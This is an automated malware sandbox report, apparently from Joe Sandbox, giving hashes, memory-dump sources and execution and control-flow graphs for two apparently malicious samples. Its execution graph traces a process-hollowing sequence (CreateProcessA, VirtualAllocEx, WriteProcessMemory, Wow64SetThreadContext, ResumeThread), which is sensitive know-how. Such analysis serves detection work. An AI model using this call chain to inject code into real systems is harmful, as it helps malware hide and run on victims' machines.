                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 977947dbae6510cd7a0518e274d32cc4dab657a99e65be863218670b7ab9e347
                                                                        • Instruction ID: 770cf1c84253bfc71d23fae1e88201707f83952bb501b98948e863d1423a0bc9
                                                                        • Opcode Fuzzy Hash: 977947dbae6510cd7a0518e274d32cc4dab657a99e65be863218670b7ab9e347
                                                                        • Instruction Fuzzy Hash: C5214FB4A1021ADFCF45FBB6D8546AEBBB6FF88300F104A69E115A7354EB706A40CF51
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d749449ca3adbd2dea4fec1b0e8ed0bae3439ee05051e2d644c52f1303614da3
                                                                        • Instruction ID: d7664f4d41706447bef2a9446b43989e208c0b1558a10efbbde33b6a83ffde08
                                                                        • Opcode Fuzzy Hash: d749449ca3adbd2dea4fec1b0e8ed0bae3439ee05051e2d644c52f1303614da3
                                                                        • Instruction Fuzzy Hash: 4D110A705442579FCB02EF3BF9909463BB6FB88384B004F65E1059B26AE77069458B81
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a65687b60596492c603b7fbc59a0617598e6c69976f25ee8db0466bfdd9d945
                                                                        • Instruction ID: 8d97b146e5a3ad14210d5b73e7ba1c88a3d905c9cda61c868c8cc4b188b4d0ef
                                                                        • Opcode Fuzzy Hash: 2a65687b60596492c603b7fbc59a0617598e6c69976f25ee8db0466bfdd9d945
                                                                        • Instruction Fuzzy Hash: 6B1100B4D0011EEFCF48EFB9E95059DBBB1FB88308B008AA9D425A7258EB741A44CF55
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 86b11f99a9ad6276c2bcc2d6798954d74d1123ea536ad75ee45f3f3f22df3680
                                                                        • Instruction ID: 97d15ea98640123f124a14ae1d14ae0c66d3f92f090dbc14deed07fc16989027
                                                                        • Opcode Fuzzy Hash: 86b11f99a9ad6276c2bcc2d6798954d74d1123ea536ad75ee45f3f3f22df3680
                                                                        • Instruction Fuzzy Hash: AF01C97455026B9FCB02EF2BF990A4737A6F788384B004F64E1058B26EE7707A458B81

                                                                        Execution Graph

                                                                        Execution Coverage:10.6%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:228
                                                                        Total number of Limit Nodes:10
                                                                        execution_graph 27828 73244c0 27829 73244e6 27828->27829 27830 732464b 27828->27830 27829->27830 27833 7324740 PostMessageW 27829->27833 27835 7324738 PostMessageW 27829->27835 27834 73247ac 27833->27834 27834->27829 27836 73247ac 27835->27836 27836->27829 27559 14c4668 27560 14c467a 27559->27560 27561 14c4686 27560->27561 27565 14c4779 27560->27565 27570 14c3e34 27561->27570 27563 14c46a5 27566 14c479d 27565->27566 27574 14c4888 27566->27574 27578 14c4879 27566->27578 27571 14c3e3f 27570->27571 27586 14c5c44 27571->27586 27573 14c7018 27573->27563 27576 14c48af 27574->27576 27575 14c498c 27575->27575 27576->27575 27582 14c44b4 27576->27582 27580 14c4888 27578->27580 27579 14c498c 27579->27579 27580->27579 27581 14c44b4 CreateActCtxA 27580->27581 27581->27579 27583 14c5918 CreateActCtxA 27582->27583 27585 14c59db 27583->27585 27587 14c5c4f 27586->27587 27590 14c5c64 27587->27590 27589 14c70bd 27589->27573 27591 14c5c6f 27590->27591 27594 14c5c94 27591->27594 27593 14c719a 27593->27589 27595 14c5c9f 27594->27595 27598 14c5cc4 27595->27598 27597 14c728d 27597->27593 27599 14c5ccf 27598->27599 27601 14c858b 27599->27601 27605 14cac3b 27599->27605 27600 14c85c9 27600->27597 27601->27600 27609 14ccd29 27601->27609 27614 14ccd38 27601->27614 27619 14cac5f 27605->27619 27623 14cac70 27605->27623 27606 14cac4e 27606->27601 27610 14ccd59 27609->27610 27611 14ccd7d 27610->27611 27631 14cced8 27610->27631 27635 14ccee8 27610->27635 27611->27600 27615 14ccd59 27614->27615 27616 14ccd7d 27615->27616 27617 14cced8 GetModuleHandleW 27615->27617 27618 14ccee8 GetModuleHandleW 27615->27618 27616->27600 27617->27616 27618->27616 27620 14cac70 27619->27620 27626 14cad68 27620->27626 27621 14cac7f 27621->27606 27625 14cad68 GetModuleHandleW 27623->27625 27624 14cac7f 27624->27606 27625->27624 27627 14cad9c 27626->27627 27628 14cad79 27626->27628 27627->27621 27628->27627 27629 14cafa0 GetModuleHandleW 27628->27629 
27630 14cafcd 27629->27630 27630->27621 27632 14ccef5 27631->27632 27633 14ccf2f 27632->27633 27639 14cbaa0 27632->27639 27633->27611 27637 14ccef5 27635->27637 27636 14ccf2f 27636->27611 27637->27636 27638 14cbaa0 GetModuleHandleW 27637->27638 27638->27636 27640 14cbaab 27639->27640 27642 14cdc48 27640->27642 27643 14cd29c 27640->27643 27642->27642 27644 14cd2a7 27643->27644 27645 14c5cc4 GetModuleHandleW 27644->27645 27646 14cdcb7 27645->27646 27646->27642 27647 73215d9 27649 732158c 27647->27649 27648 73215c9 27649->27648 27653 7323270 27649->27653 27671 73232ce 27649->27671 27690 7323260 27649->27690 27654 732328a 27653->27654 27655 73232ae 27654->27655 27708 7323952 27654->27708 27712 7323cce 27654->27712 27717 7323c4b 27654->27717 27722 7323f8a 27654->27722 27726 7323ac0 27654->27726 27731 7323b00 27654->27731 27735 73236e3 27654->27735 27743 7323a1d 27654->27743 27747 732379d 27654->27747 27752 7323ddf 27654->27752 27757 73237be 27654->27757 27762 73237d1 27654->27762 27767 73238b1 27654->27767 27771 7324111 27654->27771 27775 7323d31 27654->27775 27655->27649 27672 732325c 27671->27672 27673 73232d1 27671->27673 27674 73232ae 27672->27674 27675 7323952 2 API calls 27672->27675 27676 7323d31 2 API calls 27672->27676 27677 7324111 2 API calls 27672->27677 27678 73238b1 2 API calls 27672->27678 27679 73237d1 2 API calls 27672->27679 27680 73237be 2 API calls 27672->27680 27681 7323ddf 2 API calls 27672->27681 27682 732379d 2 API calls 27672->27682 27683 7323a1d 2 API calls 27672->27683 27684 73236e3 4 API calls 27672->27684 27685 7323b00 2 API calls 27672->27685 27686 7323ac0 2 API calls 27672->27686 27687 7323f8a 2 API calls 27672->27687 27688 7323c4b 2 API calls 27672->27688 27689 7323cce 2 API calls 27672->27689 27673->27649 27674->27649 27675->27674 27676->27674 27677->27674 27678->27674 27679->27674 27680->27674 27681->27674 27682->27674 27683->27674 27684->27674 27685->27674 27686->27674 27687->27674 27688->27674 27689->27674 27691 732328a 27690->27691 
27692 73232ae 27691->27692 27693 7323952 2 API calls 27691->27693 27694 7323d31 2 API calls 27691->27694 27695 7324111 2 API calls 27691->27695 27696 73238b1 2 API calls 27691->27696 27697 73237d1 2 API calls 27691->27697 27698 73237be 2 API calls 27691->27698 27699 7323ddf 2 API calls 27691->27699 27700 732379d 2 API calls 27691->27700 27701 7323a1d 2 API calls 27691->27701 27702 73236e3 4 API calls 27691->27702 27703 7323b00 2 API calls 27691->27703 27704 7323ac0 2 API calls 27691->27704 27705 7323f8a 2 API calls 27691->27705 27706 7323c4b 2 API calls 27691->27706 27707 7323cce 2 API calls 27691->27707 27692->27649 27693->27692 27694->27692 27695->27692 27696->27692 27697->27692 27698->27692 27699->27692 27700->27692 27701->27692 27702->27692 27703->27692 27704->27692 27705->27692 27706->27692 27707->27692 27780 7320ee0 27708->27780 27784 7320ee8 27708->27784 27709 7323979 27713 7323c69 27712->27713 27714 7323aae 27712->27714 27788 7320ca0 27713->27788 27792 7320c99 27713->27792 27714->27655 27718 7323c51 27717->27718 27720 7320ca0 ResumeThread 27718->27720 27721 7320c99 ResumeThread 27718->27721 27719 7323aae 27719->27655 27720->27719 27721->27719 27796 7320e21 27722->27796 27800 7320e28 27722->27800 27723 7323fa8 27727 7323ac6 27726->27727 27804 7320fd0 27727->27804 27808 7320fd8 27727->27808 27728 732387d 27728->27655 27732 732387d 27731->27732 27733 7320fd0 ReadProcessMemory 27731->27733 27734 7320fd8 ReadProcessMemory 27731->27734 27732->27655 27733->27732 27734->27732 27736 73236f3 27735->27736 27812 7321170 27736->27812 27816 7321164 27736->27816 27745 7320ee0 WriteProcessMemory 27743->27745 27746 7320ee8 WriteProcessMemory 27743->27746 27744 7323a4e 27745->27744 27746->27744 27749 73237a6 27747->27749 27748 73237b8 27748->27655 27749->27748 27750 7320ee0 WriteProcessMemory 27749->27750 27751 7320ee8 WriteProcessMemory 27749->27751 27750->27749 27751->27749 27753 7323c52 27752->27753 27754 7323aae 27753->27754 27755 7320ca0 ResumeThread 27753->27755 27756 
7320c99 ResumeThread 27753->27756 27754->27655 27755->27754 27756->27754 27758 73237a6 27757->27758 27758->27757 27759 73237b8 27758->27759 27760 7320ee0 WriteProcessMemory 27758->27760 27761 7320ee8 WriteProcessMemory 27758->27761 27759->27655 27760->27758 27761->27758 27763 73237de 27762->27763 27765 7320fd0 ReadProcessMemory 27763->27765 27766 7320fd8 ReadProcessMemory 27763->27766 27764 732387d 27764->27655 27765->27764 27766->27764 27820 7320d50 27767->27820 27824 7320d49 27767->27824 27768 73238cb 27768->27655 27773 7320d50 Wow64SetThreadContext 27771->27773 27774 7320d49 Wow64SetThreadContext 27771->27774 27772 732412b 27773->27772 27774->27772 27777 73237a6 27775->27777 27776 73237b8 27776->27655 27777->27776 27778 7320ee0 WriteProcessMemory 27777->27778 27779 7320ee8 WriteProcessMemory 27777->27779 27778->27777 27779->27777 27781 7320ee8 WriteProcessMemory 27780->27781 27783 7320f87 27781->27783 27783->27709 27785 7320f30 WriteProcessMemory 27784->27785 27787 7320f87 27785->27787 27787->27709 27789 7320ce0 ResumeThread 27788->27789 27791 7320d11 27789->27791 27791->27714 27793 7320ce0 ResumeThread 27792->27793 27795 7320d11 27793->27795 27795->27714 27797 7320e28 VirtualAllocEx 27796->27797 27799 7320ea5 27797->27799 27799->27723 27801 7320e68 VirtualAllocEx 27800->27801 27803 7320ea5 27801->27803 27803->27723 27805 7321023 ReadProcessMemory 27804->27805 27807 7321067 27805->27807 27807->27728 27809 7321023 ReadProcessMemory 27808->27809 27811 7321067 27809->27811 27811->27728 27813 73211f9 27812->27813 27813->27813 27814 732135e CreateProcessA 27813->27814 27815 73213bb 27814->27815 27817 73211f9 27816->27817 27817->27817 27818 732135e CreateProcessA 27817->27818 27819 73213bb 27818->27819 27821 7320d95 Wow64SetThreadContext 27820->27821 27823 7320ddd 27821->27823 27823->27768 27825 7320d50 Wow64SetThreadContext 27824->27825 27827 7320ddd 27825->27827 27827->27768 27837 7321649 27838 732158c 27837->27838 27839 73215c9 27838->27839 27840 7323270 12 API 
calls 27838->27840 27841 7323260 12 API calls 27838->27841 27842 73232ce 12 API calls 27838->27842 27840->27838 27841->27838 27842->27838 27545 14cd000 27546 14cd046 27545->27546 27550 14cd5e8 27546->27550 27553 14cd5d9 27546->27553 27547 14cd133 27551 14cd616 27550->27551 27556 14cd23c 27550->27556 27551->27547 27554 14cd23c DuplicateHandle 27553->27554 27555 14cd616 27554->27555 27555->27547 27557 14cd650 DuplicateHandle 27556->27557 27558 14cd6e6 27557->27558 27558->27551

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 451 73734b8-73734e0 452 73734e7-73735a3 451->452 453 73734e2 451->453 456 73735a5-73735cb 452->456 457 73735a8-73735b5 452->457 453->452 459 73735d1-73735fb 456->459 460 7373abb-7373afd 456->460 457->456 463 7373601-7373619 459->463 464 7373cc8-7373cd4 459->464 469 7373b00-7373b04 460->469 465 737361f-7373620 463->465 466 7373cda-7373ce3 463->466 464->466 468 7373cae-7373cba 465->468 474 7373ce9-7373cf5 466->474 472 7373625-7373631 468->472 473 7373cc0-7373cc7 468->473 470 73736d6-73736da 469->470 471 7373b0a-7373b10 469->471 476 73736ec-73736f2 470->476 477 73736dc-73736ea 470->477 471->460 475 7373b12-7373b6d 471->475 478 7373633 472->478 479 7373638-7373653 472->479 480 7373cfb-7373d07 474->480 498 7373ba4-7373bce 475->498 499 7373b6f-7373ba2 475->499 482 7373737-737373b 476->482 481 737374a-737377c 477->481 478->479 479->474 483 7373659-737367e 479->483 487 7373d0d-7373d14 480->487 505 73737a6 481->505 506 737377e-737378a 481->506 484 73736f4-7373700 482->484 485 737373d 482->485 483->480 497 7373684-7373686 483->497 490 7373707-737370f 484->490 491 7373702 484->491 488 7373740-7373744 485->488 488->481 493 73736bc-73736d3 488->493 495 7373734 490->495 496 7373711-7373725 490->496 491->490 493->470 495->482 501 737372b-7373732 496->501 502 7373689-7373694 496->502 497->502 513 7373bd7-7373c56 498->513 499->513 501->485 502->487 503 737369a-73736b7 502->503 503->488 511 73737ac-73737d9 505->511 508 7373794-737379a 506->508 509 737378c-7373792 506->509 514 73737a4 508->514 509->514 518 73737db-7373813 511->518 519 7373828-73738bb 511->519 526 7373c5d-7373c70 513->526 514->511 527 7373c7f-7373c84 518->527 534 73738c4-73738c5 519->534 535 73738bd 519->535 526->527 528 7373c86-7373c94 527->528 529 7373c9b-7373cab 527->529 528->529 529->468 536 7373916-737391c 534->536 535->534 537 73738c7-73738e6 536->537 538 737391e-73739e0 536->538 539 73738ed-7373913 537->539 540 73738e8 
537->540 549 73739e2-7373a1b 538->549 550 7373a21-7373a25 538->550 539->536 540->539 549->550 551 7373a27-7373a60 550->551 552 7373a66-7373a6a 550->552 551->552 553 7373a6c-7373aa5 552->553 554 7373aab-7373aaf 552->554 553->554 554->475 557 7373ab1-7373ab9 554->557 557->469
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'tq$:$pxq$~
                                                                        • API String ID: 0-2366959149
                                                                        • Opcode ID: c259f5e060ef6e3126e1a2da4cc67a162833247265d646ad1db912180f1b8334
                                                                        • Instruction ID: 37980556326a9da61da9ca34090a5ff47ad9ff8403db7ccacee84cf2beba569d
                                                                        • Opcode Fuzzy Hash: c259f5e060ef6e3126e1a2da4cc67a162833247265d646ad1db912180f1b8334
                                                                        • Instruction Fuzzy Hash: 9F42E3B5A00258DFEB25CFA9C980B99BBB2FF49300F1580E9E509AB361D7359D91DF10

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 589 7372106-737210a 590 7372acd-7372adf 589->590 591 737210b-7372120 589->591 591->590 592 7372121-737212c 591->592 594 7372132-737213e 592->594 595 737214a-7372159 594->595 597 73721b8-73721bc 595->597 598 7372264-73722ce 597->598 599 73721c2-73721cb 597->599 598->590 637 73722d4-737281b 598->637 600 73720c6-73720d2 599->600 601 73721d1-73721e7 599->601 600->590 603 73720d8-73720e4 600->603 609 7372239-737224b 601->609 610 73721e9-73721ec 601->610 604 73720e6-73720fa 603->604 605 737215b-7372161 603->605 604->605 615 73720fc-7372105 604->615 605->590 607 7372167-737217f 605->607 607->590 618 7372185-73721ad 607->618 619 7372251-7372261 609->619 620 7372a0c-7372ac2 609->620 610->590 611 73721f2-737222f 610->611 611->598 633 7372231-7372237 611->633 615->589 618->597 620->590 633->609 633->610 715 7372832-73728c5 637->715 716 737281d-7372827 637->716 717 73728d0-7372963 715->717 716->717 718 737282d 716->718 719 737296e-7372a01 717->719 718->719 719->620
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D
                                                                        • API String ID: 0-2746444292
                                                                        • Opcode ID: cdc9f6d173137bd3901088de40fe8ffb57260793229d425b6d326217c2242060
                                                                        • Instruction ID: 784a7fe442b1c020de1dbb8c9b45df021e3c907f030e38ac175915ed0656a4ff
                                                                        • Opcode Fuzzy Hash: cdc9f6d173137bd3901088de40fe8ffb57260793229d425b6d326217c2242060
                                                                        • Instruction Fuzzy Hash: 8352C774A102298FCB64DF68D894AADBBB2BF89301F5041D9D50DAB365CF34AE81CF51

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 294 7372c38-7372c4a 295 7372c53-7372c5f 294->295 296 7372c4c-7372c4e 294->296 299 7372c61-7372c63 295->299 300 7372c68-7372c7d 295->300 297 7372d26-7372d2b 296->297 299->297 303 7372c91-7372c9d 300->303 304 7372c7f-7372c8a 300->304 307 7372c9f-7372ca8 303->307 308 7372caa-7372cac 303->308 304->303 307->308 309 7372cae-7372cba 308->309 310 7372cbc-7372cc0 308->310 309->310 315 7372cd2-7372cdc 309->315 311 7372cc2-7372ccc 310->311 312 7372cce-7372cd0 310->312 317 7372d38-7372d44 311->317 312->297 320 7372cde-7372cea 315->320 321 7372d2c-7372d36 315->321 322 7372d46-7372d4f 317->322 323 7372d51-7372d53 317->323 327 7372cfc-7372cfe 320->327 328 7372cec-7372cfa 320->328 321->317 322->297 323->297 327->297 328->327 330 7372d00-7372d06 328->330 331 7372d0a 330->331 332 7372d08 330->332 333 7372d0c-7372d0e 331->333 332->333 334 7372d55-7372de1 333->334 335 7372d10-7372d1c 333->335 348 7372de3-7372ded 334->348 349 7372def-7372e0b 334->349 335->334 338 7372d1e 335->338 338->297 348->349 352 7372e28-7372e3c 348->352 354 7372e23-7372e25 349->354 355 7372e0d-7372e21 349->355 359 7372e43-7372e79 352->359 355->354 355->359 364 7372e7f-7372e91 359->364 365 7372f4e-7372f51 359->365 367 7372ea6-7372ea9 364->367 368 7372e93-7372e96 364->368 371 7372eab-7372eae 367->371 372 7372eb9-7372ebf 367->372 369 7372e9c-7372e9f 368->369 370 7372f1b-7372f21 368->370 377 7372ea1 369->377 378 7372eea-7372ef0 369->378 373 7372f27-7372f33 370->373 374 7372f23-7372f25 370->374 379 7372eb4 371->379 380 7372f4a-7372f4c 371->380 375 7372ec5-7372ed1 372->375 376 7372ec1-7372ec3 372->376 381 7372f35-7372f48 373->381 374->381 382 7372ed3-7372ee8 375->382 376->382 377->380 383 7372ef6-7372f02 378->383 384 7372ef2-7372ef4 378->384 379->380 380->365 385 7372f52-7372fe5 380->385 381->380 382->380 388 7372f04-7372f19 383->388 384->388 401 7372fe7 385->401 402 7372fec-7373000 385->402 388->380 401->402 403 7373006-737300b 
402->403 404 73730f4 402->404 405 73730c6 403->405 406 7373011-7373016 403->406 409 73730fa-73730fb 404->409 442 73730c9 call 73784fa 405->442 443 73730c9 call 7378508 405->443 407 7373100 406->407 408 737301c-737301d 406->408 434 7373100 call 73732c2 407->434 435 7373100 call 73732d0 407->435 444 7373020 call 7373d21 408->444 445 7373020 call 7373d30 408->445 446 7373020 call 7373d9e 408->446 409->403 410 73730cf-73730da 418 73730e3 410->418 419 73730dc-73730e0 410->419 411 7373026-7373033 413 737310c-7373113 411->413 414 7373039-737303d 411->414 412 7373106-7373107 412->408 413->414 416 7373043-737305b 414->416 417 7373118-737311f 414->417 426 7373124-737312b 416->426 427 7373061-7373064 416->427 417->416 449 73730e3 call 7324458 418->449 450 73730e3 call 7324449 418->450 420 7373086-7373087 419->420 421 73730e2 419->421 436 737308a call 7376c28 420->436 437 737308a call 7376c18 420->437 421->418 423 73730e9-73730f1 425 7373090-737309c 438 737309f call 7377f41 425->438 439 737309f call 7377f50 425->439 426->427 440 7373067 call 73743b0 427->440 441 7373067 call 73743c0 427->441 428 73730a5-73730b2 428->418 430 73730b4 428->430 429 737306d-737307a 431 7373130-7373137 429->431 432 7373080 429->432 447 73730b7 call 73783d8 430->447 448 73730b7 call 73783c8 430->448 431->432 432->420 433 73730bd-73730c3 433->405 434->412 435->412 436->425 437->425 438->428 439->428 440->429 441->429 442->410 443->410 444->411 445->411 446->411 447->433 448->433 449->423 450->423
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'tq$4'tq$4'tq$4|yq$4|yq$$tq
                                                                        • API String ID: 0-3472957384
                                                                        • Opcode ID: 6f9439276c5c5fe2cf61976536e09dfef422c739f13dab4a4aed38a3583eedcf
                                                                        • Instruction ID: d80af559647c4f1b036f9fc1f635d0a75183af5b28669b6f722270c87a59e639
                                                                        • Opcode Fuzzy Hash: 6f9439276c5c5fe2cf61976536e09dfef422c739f13dab4a4aed38a3583eedcf
                                                                        • Instruction Fuzzy Hash: CFE1DDB5B1421A8FDB25DB79D85467E7BF6BF89201B18446AE00ADB360DF38CC41CB91

                                                                        Control-flow Graph

                                                                        control_flow_graph 744 7321164-7321205 746 7321207-7321211 744->746 747 732123e-732125e 744->747 746->747 748 7321213-7321215 746->748 754 7321260-732126a 747->754 755 7321297-73212c6 747->755 749 7321217-7321221 748->749 750 7321238-732123b 748->750 752 7321223 749->752 753 7321225-7321234 749->753 750->747 752->753 753->753 756 7321236 753->756 754->755 757 732126c-732126e 754->757 761 73212c8-73212d2 755->761 762 73212ff-73213b9 CreateProcessA 755->762 756->750 759 7321270-732127a 757->759 760 7321291-7321294 757->760 763 732127e-732128d 759->763 764 732127c 759->764 760->755 761->762 766 73212d4-73212d6 761->766 775 73213c2-7321448 762->775 776 73213bb-73213c1 762->776 763->763 765 732128f 763->765 764->763 765->760 767 73212d8-73212e2 766->767 768 73212f9-73212fc 766->768 770 73212e6-73212f5 767->770 771 73212e4 767->771 768->762 770->770 773 73212f7 770->773 771->770 773->768 786 732144a-732144e 775->786 787 7321458-732145c 775->787 776->775 786->787 788 7321450 786->788 789 732145e-7321462 787->789 790 732146c-7321470 787->790 788->787 789->790 793 7321464 789->793 791 7321472-7321476 790->791 792 7321480-7321484 790->792 791->792 794 7321478 791->794 795 7321496-732149d 792->795 796 7321486-732148c 792->796 793->790 794->792 797 73214b4 795->797 798 732149f-73214ae 795->798 796->795 800 73214b5 797->800 798->797 800->800
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073213A6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 17161b6ce4a2f0579349d5890516a7e890e5dc72c5198aa7195f99b59a128b24
                                                                        • Instruction ID: ba540bb49e08c646811df5b4c1bd02fba82d841b4e2ecf3ac1a4153b374566c1
                                                                        • Opcode Fuzzy Hash: 17161b6ce4a2f0579349d5890516a7e890e5dc72c5198aa7195f99b59a128b24
                                                                        • Instruction Fuzzy Hash: E6A15EB1D0076ECFEB14DFA8C941BDDBBB2BB48310F148569E808A7240DB759986DF91

                                                                        Control-flow Graph

                                                                        control_flow_graph 801 7321170-7321205 803 7321207-7321211 801->803 804 732123e-732125e 801->804 803->804 805 7321213-7321215 803->805 811 7321260-732126a 804->811 812 7321297-73212c6 804->812 806 7321217-7321221 805->806 807 7321238-732123b 805->807 809 7321223 806->809 810 7321225-7321234 806->810 807->804 809->810 810->810 813 7321236 810->813 811->812 814 732126c-732126e 811->814 818 73212c8-73212d2 812->818 819 73212ff-73213b9 CreateProcessA 812->819 813->807 816 7321270-732127a 814->816 817 7321291-7321294 814->817 820 732127e-732128d 816->820 821 732127c 816->821 817->812 818->819 823 73212d4-73212d6 818->823 832 73213c2-7321448 819->832 833 73213bb-73213c1 819->833 820->820 822 732128f 820->822 821->820 822->817 824 73212d8-73212e2 823->824 825 73212f9-73212fc 823->825 827 73212e6-73212f5 824->827 828 73212e4 824->828 825->819 827->827 830 73212f7 827->830 828->827 830->825 843 732144a-732144e 832->843 844 7321458-732145c 832->844 833->832 843->844 845 7321450 843->845 846 732145e-7321462 844->846 847 732146c-7321470 844->847 845->844 846->847 850 7321464 846->850 848 7321472-7321476 847->848 849 7321480-7321484 847->849 848->849 851 7321478 848->851 852 7321496-732149d 849->852 853 7321486-732148c 849->853 850->847 851->849 854 73214b4 852->854 855 732149f-73214ae 852->855 853->852 857 73214b5 854->857 855->854 857->857
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073213A6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: e8aa077d89de18b88b5ab7959629fece2faa3b59fd6afed2fc87c0fdd5fc465e
                                                                        • Instruction ID: 57a1c6d8699952f6b6dc54b50ad91b0cd8335e626aa873b7085fa88096980fe6
                                                                        • Opcode Fuzzy Hash: e8aa077d89de18b88b5ab7959629fece2faa3b59fd6afed2fc87c0fdd5fc465e
                                                                        • Instruction Fuzzy Hash: D7915DB1D0036ECFEB14DFA8C941BDDBBB2BB48310F148569E808A7240DB759986DF91

                                                                        Control-flow Graph

                                                                        control_flow_graph 858 14cad68-14cad77 859 14cad79-14cad86 call 14ca08c 858->859 860 14cada3-14cada7 858->860 867 14cad9c 859->867 868 14cad88 859->868 861 14cada9-14cadb3 860->861 862 14cadbb-14cadfc 860->862 861->862 869 14cadfe-14cae06 862->869 870 14cae09-14cae17 862->870 867->860 913 14cad8e call 14caff0 868->913 914 14cad8e call 14cb000 868->914 869->870 871 14cae19-14cae1e 870->871 872 14cae3b-14cae3d 870->872 875 14cae29 871->875 876 14cae20-14cae27 call 14ca098 871->876 874 14cae40-14cae47 872->874 873 14cad94-14cad96 873->867 877 14caed8-14caf98 873->877 878 14cae49-14cae51 874->878 879 14cae54-14cae5b 874->879 881 14cae2b-14cae39 875->881 876->881 908 14caf9a-14caf9d 877->908 909 14cafa0-14cafcb GetModuleHandleW 877->909 878->879 882 14cae5d-14cae65 879->882 883 14cae68-14cae71 call 14ca0a8 879->883 881->874 882->883 889 14cae7e-14cae83 883->889 890 14cae73-14cae7b 883->890 891 14cae85-14cae8c 889->891 892 14caea1-14caea5 889->892 890->889 891->892 894 14cae8e-14cae9e call 14ca0b8 call 14ca0c8 891->894 895 14caeab-14caeae 892->895 894->892 898 14caeb0-14caece 895->898 899 14caed1-14caed7 895->899 898->899 908->909 910 14cafcd-14cafd3 909->910 911 14cafd4-14cafe8 909->911 910->911 913->873 914->873
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 014CAFBE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849824069.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_14c0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: bd6f234347741e65629e30b1ce64767be471777318222dbef2515331cbe4cfb0
                                                                        • Instruction ID: 4e1ad9bc459e8504ad052b1c05b171814f80d40036ca0ed4c6a7c5c3d1523003
                                                                        • Opcode Fuzzy Hash: bd6f234347741e65629e30b1ce64767be471777318222dbef2515331cbe4cfb0
                                                                        • Instruction Fuzzy Hash: 707125B4A00B498FD764DF6AD04475ABBF1BF88714F208A2ED44AD7B50E734E849CB91

                                                                        Control-flow Graph

                                                                        control_flow_graph 915 14c44b4-14c59d9 CreateActCtxA 918 14c59db-14c59e1 915->918 919 14c59e2-14c5a3c 915->919 918->919 926 14c5a3e-14c5a41 919->926 927 14c5a4b-14c5a4f 919->927 926->927 928 14c5a60 927->928 929 14c5a51-14c5a5d 927->929 931 14c5a61 928->931 929->928 931->931
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 014C59C9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849824069.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
